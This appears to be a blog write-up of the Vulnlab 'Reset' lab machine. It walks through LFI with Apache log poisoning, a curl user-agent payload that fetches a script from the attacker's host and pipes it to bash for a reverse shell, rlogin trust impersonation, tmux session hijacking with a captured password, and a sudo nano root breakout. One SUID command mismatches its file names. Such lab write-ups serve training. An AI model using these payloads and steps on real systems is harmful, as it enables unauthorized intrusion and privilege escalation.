Skip to main content
HashnodeMyHackMyHack

Command Palette

Search for a command to run...

Reset - Writeup (Vulnlab)

Updated
3 min read
Reset - Writeup (Vulnlab)
S
shkz
I am shkz, a Security Researcher, Red Team and CTF Player.

Box Summary

The box had an LFI in a web dashboard that allowed log poisoning, leading to a shell as www-data. From there, I found sadm was a trusted user via rlogin, so I created a local user with the same name and logged in without a password. Inside, I attached to an open tmux session and grabbed sadm‘s password. Finally, using a sudo nano privilege, I escalated to root with a quick breakout.

INFO

I started with a basic scan and found this:

22/tcp  open  ssh
80/tcp  open  http
512/tcp open  exec
513/tcp open  login
514/tcp open  shell

FOOTHOLD

Port 80 was running a web server with a simple Reset button. I tried submitting admin and it worked. Captured the request using CAIDO and saw the password exposed in plain text.

LFI

After logging into the Dashboard, I saw this:

Checking how the data was being loaded, I found this:

file=%2Fvar%2Flog%2Fapache2%2Faccess.log

So I threw in a standard Linux LFI wordlist and got some hits:

Poisoning Logs

From what I saw, the dashboard was reading log files like syslog and auth.log, so I decided to try log poisoning.

Used this:

curl -A "<?php system('curl 10.10.14.61/rev.sh|bash'); ?>" http://10.129.184.161/

Then accessed the log via LFI like this:

file=../../../../../../../var/log/apache2/access.log

And got a shell!

We can cat the user.txt file as www-data, located at /home/sadm/user.txt.

While exploring, I noticed that sadm was listed as a trusted user. We can see that rlogin is set up through the /etc/hosts.equiv file, and that file is present on the box.

Another interesting thing is that we can see the user sadm has an active tmux session.

SADM USER | RLOGIN

To use rlogin, I saw that sadm was listed as a trusted user in /etc/hosts.equiv. So locally I created a user with the same name:

sudo useradd sadm
sudo passwd sadm

su sadm
rlogin 10.129.184.161

Logged in without password!

TMUX Session

I had already noticed that there was a tmux session running as sadm. For those who don’t know, tmux lets you have multiple terminal windows in one session and stay connected even if you close the shell:

tmux ls
sadm_session: 1 windows (created Wed Jul 16 03:25:31 2025)

tmux a -t sadm_session

And.. we got sadm password!

Password: 7lE2PAfVHfjz4HpE

PrivEsc to ROOT

Logged in as sadm using the found password. Checked for sudo rights:

sadm@reset:~$ sudo -l
Matching Defaults entries for sadm on reset:
    env_reset, timestamp_timeout=-1, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User sadm may run the following commands on reset:
    (ALL) PASSWD: /usr/bin/nano /etc/firewall.sh
    (ALL) PASSWD: /usr/bin/tail /var/log/syslog
    (ALL) PASSWD: /usr/bin/tail /var/log/auth.log

The fact that I could run nano as sudo was perfect, just a classic breakout opportunity :D

sudo /usr/bin/nano /etc/firewall.sh

# Inside nano:
Ctrl + R
Ctrl + X

reset; sh 1>&0 2>&0

Alternative method I tried:

cp /bin/bash /tmp/bash && chmod +xs /tmp/shaka
cd /tmp/
./shaka -p

And got root access:

Pwned!

#reset#writeup#vulnlab

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

M

MyHack

42 posts

MyHack.tech is a personal blog focused on Hacking, Linux, CTF challenges and practical Offensive Security..